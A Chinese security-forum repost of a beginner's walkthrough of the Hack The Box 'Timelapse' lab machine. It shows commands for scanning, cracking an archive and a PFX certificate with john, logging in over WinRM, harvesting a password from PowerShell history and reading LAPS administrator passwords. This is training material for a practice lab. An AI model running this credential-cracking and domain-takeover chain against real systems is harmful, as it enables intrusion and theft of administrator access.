安全矩阵

 找回密码
 立即注册
搜索
查看: 924|回复: 0

渗透测试平台 -- Hack The Box

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-9-18 20:42:28 | 显示全部楼层 |阅读模式

渗透测试平台 -- Hack The Box
原文链接:渗透测试平台 -- Hack The Box
W_mingle Web安全工具库  2022-09-18 00:00 发表于河南
===================================
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

前言

Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。
Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。
Hack The Box官网:https://www.hackthebox.com
如何开始在注册好账号之后,我们需要去下载两个连接文件。在自己的home页面的右上角有一个Connect to HTB。
编辑
需要申请这两个连接文件,具体操作参考:HTB连接
正题:Timelapse靶场连接
这是我的两个连接文件,
编辑
利用kali自带的工具进行连接
编辑
编辑
编辑
连接成功。
启动靶场

选择好靶机后,点击Join Machine就能启动靶机,靶机会提供一个IP。
编辑
开始测试
靶机IP:10.10.11.152
连通性测试
ping 10.10.11.152
端口扫描
nmap -sC -sV  -oN myscan.txt 10.10.11.152
通过端口扫描发现,主机开放了一下端口,
编辑
查看smb共享,
smbclient -L 10.10.11.152
存在如下共享目录,
编辑
在Share的Dev目录下发现一个压缩包,
编辑
获取压缩包文件(获取可能会失败,多尝试几次),
解压时发现需要解压密码,
利用zip2john进行解密,
提取压缩包的hash值,
zip2john winrm_backup.zip >> hash
利用字典进行爆破,
john --wordlist=/home/Password-Top1000(1010).txt hash
爆破出密码为:supremelegacy。
解压出来的文件还需要密码才能访问,
之前爆破出来的密码不正确不能访问,
pfx文件是经过秘钥加密的,我们可以使用命令openssl进行分析,并且要同时使用pkcs12文件工具,生成和分析pkcs12文件,
导出pfx文件的hash,
pfx2john  legacyy_dev_auth.pfx >pfx_hash
再次利用john爆破密码,
john --wordlist=/home/PassWord.txt pfx_hash
密码为:thuglegacy
发现这是个私钥文件,
编辑
利用openssl进行生成,三个密码都是我们之前生成的得到的thuglegacy,得到了私钥文件。
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
得到私钥文件,还需要生成证书,
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
在开头信息收集的时候看到了开启了5986端口,这个端口是用于横向渗透的端口,可以使用命令evil-winrm进行连接。
利用生成的私钥文件和证书进行登陆,
evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u
登陆密码为我们前面设置的密码,
编辑
成功找到user.txt文件,
编辑
这样就拿到了userown了,但是目标是要拿到systemown,就需要进行提取。
提权

上传提权文件
upload /home/winPEASx64.exe
下载地址
编辑
运行该文件
找到一个历史文件
编辑
下载该文件
download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
查看文件内容
找到一个用户和密码
使用该用户凭证
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
传递命令
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}
dc01
抓取用户凭证
使用AD-Module,查看 LAPS 密码
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}
成功获取到administrator的密码。
尝试登陆
evil-winrm -i 10.10.11.152 -S -u 'administrator' -p 'z+&4Olgpgn;,11t5XbE#x0,2'
成功登陆。
最终在rtx用户的桌面找到root.txt获得系统拥有权。
后记

作为一个刚入行的小白,第一次发表文章,求大佬们多多指点!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 22:56 , Processed in 0.015730 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表